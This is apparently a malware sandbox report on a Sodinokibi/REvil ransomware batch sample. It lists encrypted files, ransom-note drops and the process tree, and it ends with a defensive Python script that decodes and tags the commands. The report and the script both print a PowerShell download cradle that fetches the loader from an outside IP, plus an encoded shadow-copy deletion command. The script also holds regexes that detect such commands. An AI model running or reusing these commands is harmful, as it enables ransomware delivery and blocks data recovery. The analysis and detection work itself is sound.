Analysis
max time kernel: 38s
max time network: 49s
platform: windows7_x64
resource: win7v200722
submitted: 18-08-2020 22:10

Static task: static1
Behavioral task: behavioral1
  Sample: 257963fd8d55fc6eb395408d6cd8eb10.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 257963fd8d55fc6eb395408d6cd8eb10.bat
  Resource: win10

General
Target: 257963fd8d55fc6eb395408d6cd8eb10.bat
Size: 216B
MD5: db422fe5e7b4c0a610a166c2521c5b0b
SHA1: 4df900c107ef17b5d139be2fb8792908a137c1e2
SHA256: 2b9bf7f85b20bc24437ed489cc2b0c2d4ccf0b13baa34e27568ae61d1f67a31f
SHA512: c19beefe11cd9b28d379f33f04061f1a75f52b017cc835997470344c27bb0274a1f555d4f89180183a5168113cd984a682e5db5e1afb5d6fd0eab3e511388f5b
Malware Config
Extracted
  URL: http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10
Extracted
  Path: C:\w0vf95w-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3738B80C8CFAFDD2
    http://decryptor.cc/3738B80C8CFAFDD2
Signatures
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (1 IoC)
Processes:
  flow | pid | process
  3 | 272 | powershell.exe
Modifies extensions of user files (12 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes:
  description | ioc | process
  File opened for modification | \??\c:\users\admin\pictures\StopGroup.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\HidePing.tiff => \??\c:\users\admin\pictures\HidePing.tiff.w0vf95w | powershell.exe
  File renamed | C:\Users\Admin\Pictures\LimitInvoke.tif => \??\c:\users\admin\pictures\LimitInvoke.tif.w0vf95w | powershell.exe
  File renamed | C:\Users\Admin\Pictures\EnterStop.raw => \??\c:\users\admin\pictures\EnterStop.raw.w0vf95w | powershell.exe
  File renamed | C:\Users\Admin\Pictures\PublishUnblock.crw => \??\c:\users\admin\pictures\PublishUnblock.crw.w0vf95w | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ResetRepair.raw => \??\c:\users\admin\pictures\ResetRepair.raw.w0vf95w | powershell.exe
  File renamed | C:\Users\Admin\Pictures\StopGroup.tiff => \??\c:\users\admin\pictures\StopGroup.tiff.w0vf95w | powershell.exe
  File opened for modification | \??\c:\users\admin\pictures\DisableExpand.tiff | powershell.exe
  File opened for modification | \??\c:\users\admin\pictures\HidePing.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\DisableExpand.tiff => \??\c:\users\admin\pictures\DisableExpand.tiff.w0vf95w | powershell.exe
  File renamed | C:\Users\Admin\Pictures\EditRepair.png => \??\c:\users\admin\pictures\EditRepair.png.w0vf95w | powershell.exe
  File renamed | C:\Users\Admin\Pictures\WatchEnter.raw => \??\c:\users\admin\pictures\WatchEnter.raw.w0vf95w | powershell.exe
Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8214dbkpdm.bmp" | powershell.exe
Drops file in Program Files directory (25 IoCs)
Processes:
  description | ioc | process
  File opened for modification | \??\c:\program files\WatchUnblock.inf | powershell.exe
  File opened for modification | \??\c:\program files\ConvertToSet.M2V | powershell.exe
  File opened for modification | \??\c:\program files\EnterUse.3gp | powershell.exe
  File opened for modification | \??\c:\program files\TestShow.rtf | powershell.exe
  File opened for modification | \??\c:\program files\TraceComplete.css | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\w0vf95w-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\StopSwitch.i64 | powershell.exe
  File opened for modification | \??\c:\program files\UnpublishSubmit.ogg | powershell.exe
  File created | \??\c:\program files\w0vf95w-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ConnectConvertFrom.wmf | powershell.exe
  File opened for modification | \??\c:\program files\ExportImport.wma | powershell.exe
  File opened for modification | \??\c:\program files\ExportTest.mpg | powershell.exe
  File opened for modification | \??\c:\program files\UseSelect.ttf | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w0vf95w-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\GroupPublish.M2V | powershell.exe
  File opened for modification | \??\c:\program files\MountRestart.mpv2 | powershell.exe
  File opened for modification | \??\c:\program files\StepEnter.php | powershell.exe
  File opened for modification | \??\c:\program files\UnlockSet.mpp | powershell.exe
  File opened for modification | \??\c:\program files\RequestSearch.mpg | powershell.exe
  File opened for modification | \??\c:\program files\SetJoin.avi | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\w0vf95w-readme.txt | powershell.exe
  File created | \??\c:\program files (x86)\w0vf95w-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\DisconnectExit.ppt | powershell.exe
  File opened for modification | \??\c:\program files\EnterInitialize.mpeg2 | powershell.exe
  File opened for modification | \??\c:\program files\PingEdit.ppsx | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid | process
  272 | powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  pid | process
  272 | powershell.exe
  272 | powershell.exe
  272 | powershell.exe
  1888 | powershell.exe
  1888 | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 272 | powershell.exe
  Token: SeDebugPrivilege | 272 | powershell.exe
  Token: SeDebugPrivilege | 1888 | powershell.exe
  Token: SeBackupPrivilege | 1616 | vssvc.exe
  Token: SeRestorePrivilege | 1616 | vssvc.exe
  Token: SeAuditPrivilege | 1616 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 272 | powershell.exe
Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
  description | pid | process | target process
  PID 992 wrote to memory of 272 | 992 | cmd.exe | powershell.exe
  PID 992 wrote to memory of 272 | 992 | cmd.exe | powershell.exe
  PID 992 wrote to memory of 272 | 992 | cmd.exe | powershell.exe
  PID 992 wrote to memory of 272 | 992 | cmd.exe | powershell.exe
  PID 272 wrote to memory of 1888 | 272 | powershell.exe | powershell.exe
  PID 272 wrote to memory of 1888 | 272 | powershell.exe | powershell.exe
  PID 272 wrote to memory of 1888 | 272 | powershell.exe | powershell.exe
  PID 272 wrote to memory of 1888 | 272 | powershell.exe | powershell.exe
Processes
C:\Windows\system32\cmd.exe (PID 992)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\257963fd8d55fc6eb395408d6cd8eb10.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 272)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10');Invoke-CXEMWXSCI;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1888)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\vssvc.exe (PID 1616)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
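The two PowerShell command lines in the process tree carry the whole first stage: PID 272 is a download cradle that pulls the REvil loader from 185.103.242.78 over plain HTTP and then sleeps to stay resident, and PID 1888 is a base64/UTF-16LE encoded command that decodes to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which is why vssvc.exe appears as a separate root process holding SeBackupPrivilege and touching the VSS Diag writer keys. The Python below is an added example, not part of the sandbox report or the malware: it decodes the -e payload and tags both command lines with the behaviours the report flags. The command lines are copied verbatim from the tree above; the flag-prefix handling, rule names and regexes are my own and are not an exhaustive detection set.

```python
"""Decode and triage the PowerShell command lines from the process tree."""
import base64
import re
from typing import Dict, List, Optional

# Command lines copied verbatim from the sandbox process tree (PIDs 272 and 1888).
CRADLE_CMD = (
    'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
    '"IEX (New-Object System.Net.WebClient).DownloadString('
    "'http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10');"
    'Invoke-CXEMWXSCI;Start-Sleep -s 10000"'
)
ENCODED_CMD = (
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# powershell.exe accepts abbreviated switches; -e and -ec are the documented short forms
# of -EncodedCommand. Assumption: any prefix of the full name is treated as that switch.
_ENC_FLAGS = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}
_FLAG_RE = re.compile(r"(?:^|\s)[-/](?P<flag>[A-Za-z]+)\s+(?P<b64>[A-Za-z0-9+/=]+)")

# Hypothetical detection rules written for this example; each is applied to the
# decoded script when one exists, otherwise to the raw command line.
_RULES = {
    "download_cradle": re.compile(
        r"(?:iex|invoke-expression)\b.*?(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b",
        re.I | re.S,
    ),
    "shadow_copy_deletion": re.compile(
        r"win32_shadowcopy.*?\.delete\s*\("
        r"|vssadmin(?:\.exe)?\s+delete\s+shadows"
        r"|wmic(?:\.exe)?\s+shadowcopy\s+delete",
        re.I | re.S,
    ),
    "long_sleep": re.compile(r"start-sleep\s+-s(?:econds)?\s+\d{4,}", re.I),
}
_URL_RE = re.compile(r"https?://[^\s'\"]+")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -e/-enc/-EncodedCommand, or None if absent/invalid."""
    for m in _FLAG_RE.finditer(cmdline):
        if m.group("flag").lower() not in _ENC_FLAGS:
            continue
        try:
            raw = base64.b64decode(m.group("b64"), validate=True)
            # Encoded commands are little-endian UTF-16; drop any trailing NUL padding.
            return raw.decode("utf-16-le").rstrip("\x00")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def triage(cmdline: str) -> Dict[str, object]:
    """Tag one process command line and pull out any URLs it references."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    tags = {name for name, rx in _RULES.items() if rx.search(script)}
    if decoded is not None:
        tags.add("encoded_command")
    urls: List[str] = _URL_RE.findall(cmdline) + (_URL_RE.findall(decoded) if decoded else [])
    return {"decoded": decoded, "tags": sorted(tags), "urls": urls}


if __name__ == "__main__":
    for pid, cmd in ((272, CRADLE_CMD), (1888, ENCODED_CMD)):
        result = triage(cmd)
        print(f"PID {pid}: tags={result['tags']} urls={result['urls']}")
        if result["decoded"]:
            print(f"  decoded: {result['decoded']}")
```

Running it on the two command lines reports the cradle as download_cradle plus long_sleep with the paste URL extracted, and the child as encoded_command plus shadow_copy_deletion once the -e payload is decoded. The same functions can be fed Sysmon event 1 or 4688 command lines; the important design point is that rules are matched against the decoded script, since an encoded command hides every keyword from a regex run on the raw command line.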